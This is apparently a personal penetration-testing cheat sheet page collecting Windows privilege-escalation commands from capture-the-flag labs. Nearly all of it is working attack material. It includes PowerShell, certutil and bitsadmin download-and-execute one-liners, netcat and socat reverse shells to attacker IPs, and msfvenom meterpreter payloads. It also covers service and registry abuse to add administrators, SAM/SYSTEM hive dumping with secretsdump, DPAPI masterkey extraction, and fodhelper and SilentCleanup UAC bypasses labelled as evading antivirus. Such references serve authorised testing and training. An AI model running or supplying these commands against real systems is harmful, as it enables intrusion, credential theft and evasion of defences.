ALL IN ONE

payloads

Powershell Downloading Files

#Download and execute at the same time
powershell.exe IEX(New-Object+Net.WebClient).downloadString('http%3a//10.10.14.10/rev.ps1')

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.41:8000/JuicyPotato.exe','C:/Users/kohsuke/Desktop/JuicyPotato.exe')"

powershell -c "(New-Object System.Net.WebClient).DownloadFile('http://10.10.10.14:7898/file.exe', 'file.exe')"

powershell -c '(Invoke-RestMethod -Uri "http://10.10.14.3:8000/JuicyPotato.exe" -Method Get -OutFile "jp.exe")'

powershell -c "Invoke-WebRequest -Uri 'http://10.10.10.14:7898/file.exe' -OutFile 'file.exe'"

powershell -c "$url = 'http://10.10.10.14:7898/file.exe'; $stream = [System.IO.StreamReader]::new($url); $content = $stream.ReadToEnd(); Set-Content -Path 'file.exe' -Value $content -Encoding Byte"

powershell -c "$client = New-Object Net.WebClient; $client.DownloadFile('http://10.10.10.14:7898/file.exe', 'file.exe')"

powershell -c "$url = 'http://10.10.10.14:7898/file.exe'; $request = [System.Net.HttpWebRequest]::Create($url); $response = $request.GetResponse(); $stream = $response.GetResponseStream(); $output = [System.IO.File]::Create('file.exe'); $stream.CopyTo($output); $output.Close(); $response.Close()"

Powershell references : https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcpOneLine.ps1

Others File Transfer method

Downloading from Remote Host

certutil -urlcache -f http://YOUR_IP:PORT/filename.exe renamed.exe

copy \\10.10.14.14\share\churrasco.exe c.exe

bitsadmin /transfer myDownload /priority normal http://10.10.14.3:8000/JuicyPotato.exe jp.exe

curl -O http://10.10.15.14/example.exe
 
wget http://10.10.15.14/example.exe

Listeners on localhost

sudo smbserver.py share .

nc -nvlp 1234

python3 -m http.server

nc -nv TARGET_IP 1234 < received_file

nc -nlvp 1234 > file_to_send

On the receiving end running,

nc -l -p 1234 > out.file
will begin listening on port 1234.

On the sending end running,

nc -w 3 [destination] 1234 < out.file

scp example.txt user@192.168.1.100:/path/to/destination/

scp user@192.168.1.100:/path/to/file.txt /path/on/local/machine/

echo c:\Users\kohsuke\Desktop\nc.exe 10.10.14.41 4455 -e cmd.exe > reverse.bat

File Permission Exploit

# 777 exe file ?

#Check if startup programs have write access
icacls.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
 
msfvenom -p windows/meterpreter/reverse_tcp LHOST=YOUR_IP LPORT=4567 -f exe > rev.exe
# Place rev.exe in "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup".

#Check if AlwaysInstallElevated” value is 1
reg query HKCU\Software\Policies\Microsoft\Windows\Installer
reg query HKLM\Software\Policies\Microsoft\Windows\Installer

msfvenom -p windows/meterpreter/reverse_tcp LHOST=YOUR_IP LPORT=4567 -f msi > setup.msi
msiexec /quiet /qn /i C:\Temp\setup.msi

# "User-PC\User" has the "SERVICE_CHANGE_CONFIG" permission.
 sc config daclsvc binpath= "net localgroup administrators user /add"
 sc start daclsvc

# "BINARY_PATH_NAME" field displays a path that is not confined between quotes
sc qc unquotedsvc
msfvenom -p windows/exec CMD='net localgroup administrators user /add' -f exe-service -o common.exe
1. Place common.exe in ‘C:\Program Files\Unquoted Path Service’.
2. Open command prompt and type: sc start unquotedsvc

# Has "FullContol" permission over the registry key?

Get-Acl -Path hklm:\System\CurrentControlSet\services\regsvc | fl
windows_service.c 
#include <stdlib.h> // Include the necessary header file

int main() {
    system("cmd.exe /k net localgroup administrators user /add"); // Use system() function to execute the command
    return 0;
}

x86_64-w64-mingw32-gcc windows_service.c -o x.exe 

reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d c:\temp\x.exe /f

sc start regsvc

Metasploit Windows Reverse Shell

msfvenom -p windows/meterpreter/reverse_tcp LHOST=YOUR_IP LPORT=4567 -f aspx > letmein.aspx 

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

Manual Windows Reverse Shell

python3 -m http.server

#to get reverse shell from your kali
msfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=4567 -f aspx > letmein.aspx 

msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=4567 

cd C:\Windows\Temp
certutil -urlcache -f http://YOUR_IP:PORT/filename.exe renamed.exe

Metasploit Windows suggester

background

use post/multi/recon/local_exploit_suggester

run SESSION=1

Window Suggester

winpeas

wesng

Watson (For modern Windows 10)

Sherlock (For older Windows XP / 2003)
MS10-015 : User Mode to Ring (KiTrap0D)
MS10-092 : Task Scheduler
MS13-053 : NTUserMessageCall Win32k Kernel Pool Overflow
MS13-081 : TrackPopupMenuEx Win32k NULL Page
MS14-058 : TrackPopupMenu Win32k Null Pointer Dereference
MS15-051 : ClientCopyImage Win32k
MS15-078 : Font Driver Buffer Overflow
MS16-016 : 'mrxdav.sys' WebDAV
MS16-032 : Secondary Logon Handle
MS16-034 : Windows Kernel-Mode Drivers EoP
MS16-135 : Win32k Elevation of Privilege
CVE-2017-7199 : Nessus Agent 6.6.2 - 6.10.3 Priv Esc

Windows System Enumeration

systeminfo

#32bit ? 64bit ? 68bit ?
wmic os get osarchitecture

systeminfo | findstr /b /c:"OS Name" /c:"OS Version" /c:"System Type"

wmic qfe

wmic qfe Caption,Description,HotFixID,InstalledOn

wmic logicaldisk

wmic logicaldisk get caption,description,providername

wmic logicaldisk get caption

Windows User Enumeration

whoami

whoami /priv

whoami /groups

net user

net user jack

net localgroup

net localgroup administrators

Windows Network Enumeration

netstat -ano | findstr "LISTEN"

ipconfig

ipconfig /all

#Check Incoming / Outgoing Network Traffic
arp -a

#Check route table
route print

#Check open ports
netstat -ano

Windows Password Hunting

#find 'password' in current directory with extension of txt,ini and config
findstr /si password *.txt *.ini *.config

#find 'password' in whole C: directory
dir /s C:\* | findstr /i "password"

dir /r 
dir /l /a 

#Common sus file places
C:\Users\Public
C:\Users\Test\AppData\Roaming

#Finding credential location
cmdkey /list

runas /usr:ACCESS\Administrator /savecred cmd /c 

runas /usr:ACCESS\Administrator /savecred "cmd /c C:\Users\security\Desktop\nc.exe 10.10.14.17 4567 -e cmd.exe"

Credential Extracting


reg.exe save hklm\sam C:\xampp\htdocs\oscommerce-2.3.4\sam.save
reg.exe save hklm\security C:\xampp\htdocs\oscommerce-2.3.4\security.save
reg.exe save hklm\system C:\xampp\htdocs\oscommerce-2.3.4\system.save

secretsdump.py -sam sam.save -security security.save -system system.save LOCAL

cd Windows/System32/config
secretsdump.py LOCAL -system ./SYSTEM -sam ./SAM



#cache files

#Must have admin accesss
powershell -c "$client = New-Object Net.WebClient; $client.DownloadFile('http://10.10.14.17:8000/seatbelt.exe', 'sb.exe')"

sb.exe MasterKeys
sb.exe users

# cd to MasterKey file directory
cd C:\Users\security\AppData\Roaming\Microsoft\Protect\S-1-5-21-953262931-566350628-63446256-1001

# encode and print the masterkey
certutil -encode 0792c32e-48a5-4fe3-8b43-d93d64590580 output

# save it into local machine
type output 

https://blog.harmj0y.net/redteaming/operational-guidance-for-offensive-user-dpapi-abuse/

AV Enumeration

#Check Window Defender is up or down
sc query windefend

#Check running services
sc queryx type= service

#Check FireWall Status
netsh advfirewall firewall dump
netsh firewall show state 

#Check FireWall configuration
netsh firewall show config

Bypass UAC

UAC = Prompt ask admin for confirmation yes and no

System Configuration
run "msconfig" can bypass the prompt
then launch cmd = get system

Authorization Manager
run "azman.msc"
Help -> Help Topics -> Right Click MMC -> view source

File -> open -> go find cmd.exe at C:\Windows\System32 -> right click the icon

Auto Elevate = no need prompt
Conditions:
Signed by windows publisher
Inside trusted directory like System32 , ProgramFiles

sigcheck : help identify auto-evelate on or off

fodhelper : manage window additional language and more
- no need gui can exec

When checking HKEY_CLASSES_ROOT, if there is a user-specific association at HKEY_CURRENT_USER (HKCU), 
it will take priority. If no user-specific association is configured, then the system-wide association 
at HKEY_LOCAL_MACHINE (HKLM) will be used instead


C:\> set REG_KEY=HKCU\Software\Classes\ms-settings\Shell\Open\command
C:\> set CMD="powershell -windowstyle hidden C:\Tools\socat\socat.exe TCP:<attacker_ip>:4444 EXEC:cmd.exe,pipes"

C:\> reg add %REG_KEY% /v "DelegateExecute" /d "" /f
The operation completed successfully.

C:\> reg add %REG_KEY% /d %CMD% /f
The operation completed successfully.

run fodhelper.exe

reg delete HKCU\Software\Classes\ms-settings\ /f



Windows AV detected
set REG_KEY=HKCU\Software\Classes\ms-settings\Shell\Open\command

set CMD="powershell -windowstyle hidden C:\Tools\socat\socat.exe TCP:<attacker_ip>:4444 EXEC:cmd.exe,pipes"

reg add %REG_KEY% /v "DelegateExecute" /d "" /f

reg add %REG_KEY% /d %CMD% /f 

fodhelper.exe  

==================================================================================================================
Windows AV detected v2 but still can run (RACE CONDITION)

set REG_KEY=HKCU\Software\Classes\ms-settings\Shell\Open\command

set CMD="powershell -windowstyle hidden C:\Users\kostas\Desktop\nc.exe 10.10.14.14:4747 -e cmd.exe,pipes"

reg add %REG_KEY% /v "DelegateExecute" /d "" /f

(because these 2 run together)
reg add %REG_KEY% /d %CMD% /f & fodhelper.exe  
====================================================================================================================
powershell detected AV

$program = "powershell -windowstyle hidden C:\tools\socat\socat.exe TCP:10.8.17.213:4445 EXEC:cmd.exe,pipes"

New-Item "HKCU:\Software\Classes\.pwn\Shell\Open\command" -Force

Set-ItemProperty "HKCU:\Software\Classes\.pwn\Shell\Open\command" -Name "(default)" -Value $program -Force

New-Item -Path "HKCU:\Software\Classes\ms-settings\CurVer" -Force

Set-ItemProperty  "HKCU:\Software\Classes\ms-settings\CurVer" -Name "(default)" -value ".pwn" -Force

Start-Process "C:\Windows\System32\fodhelper.exe" -WindowStyle Hidden

======================================================================================================================
Translated powershell to cmd undetected BY AV

set CMD="powershell -windowstyle hidden C:\Tools\socat\socat.exe TCP:192.168.146.141:4556 EXEC:cmd.exe,pipes"

set CMD="powershell -windowstyle hidden C:\Users\ASUS\Downloads\nc64.exe TCP:192.168.146.141:4556 EXEC:cmd.exe,pipes"

reg add "HKCU\Software\Classes\.thm\Shell\Open\command" /d %CMD% /f

reg add "HKCU\Software\Classes\ms-settings\CurVer" /d ".thm" /f

==============================================================

set CMD="powershell -windowstyle hidden C:\Tools\socat\socat.exe TCP:<attacker_ip>:4445 EXEC:cmd.exe,pipes"

reg add "HKCU\Software\Classes\.jack\Shell\Open\command" /d %CMD% /f

reg add "HKCU\Software\Classes\ms-settings\CurVer" /d ".jack" /f


reg delete "HKCU\Software\Classes\.thm\" /f
reg delete "HKCU\Software\Classes\ms-settings\" /f


==========================================

BYPASSING ALWAYS NOTIFIY
-Schedule Task will not prompt user


"cmd.exe /c C:\tools\socat\socat.exe TCP:<attacker_ip>:4445 EXEC:cmd.exe,pipes &REM "

reg add "HKCU\Environment" /v "windir" /d "cmd.exe /c C:\tools\socat\socat.exe TCP:10.8.17.213:4446 EXEC:cmd.exe,pipes &REM " /f

reg delete "HKCU\Environment" /v "windir" /f


reg add "HKCU\Environment" /v "windir" /d "cmd.exe /c C:\tools\socat\socat.exe TCP:10.8.17.213:4446 EXEC:cmd.exe,pipes &REM " /f
schtasks /run  /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I
reg delete "HKCU\Environment" /v "windir" /f

Read Permissions

#possible if user is also admin
icacls C:\Users\Administrator\Desktop\root.txt /grant username:F

icacls C:\Windows\System32\net.exe /grant username:username:F

"F" for Full control, "M" for Modify, "R" for Read, "W" for Write, "X" for Execute

Finding exe files

where /R c:\windows bash.exe
where /R c:\windows wsl.exe

 psexec.py administrator:'password'@MACHINE_IP
 
 smbexec.py administrator:'password'@MACHINE_IP
 
 wmiexec.py administrator:'password'@MACHINE_IP

References

https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/

https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_windows.html

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md

https://book.hacktricks.xyz/windows-hardening/checklist-windows-privilege-escalation

https://github.com/SecWiki/windows-kernel-exploits

PreviousPrivileges Escalation NextTHM Priv Esc

Last updated 2 years ago

hashtagpayloads

hashtagPowershell Downloading Files

hashtagOthers File Transfer method

hashtagDownloading from Remote Host

hashtagListeners on localhost

hashtagFile Permission Exploit

hashtagMetasploit Windows Reverse Shell

hashtagManual Windows Reverse Shell

hashtagMetasploit Windows suggester

hashtagWindow Suggester

hashtagWindows System Enumeration

hashtagWindows User Enumeration

hashtagWindows Network Enumeration

hashtagWindows Password Hunting

hashtagCredential Extracting

hashtagAV Enumeration

hashtagBypass UAC

hashtagRead Permissions

hashtagFinding exe files

hashtagLogin methods

hashtagReferences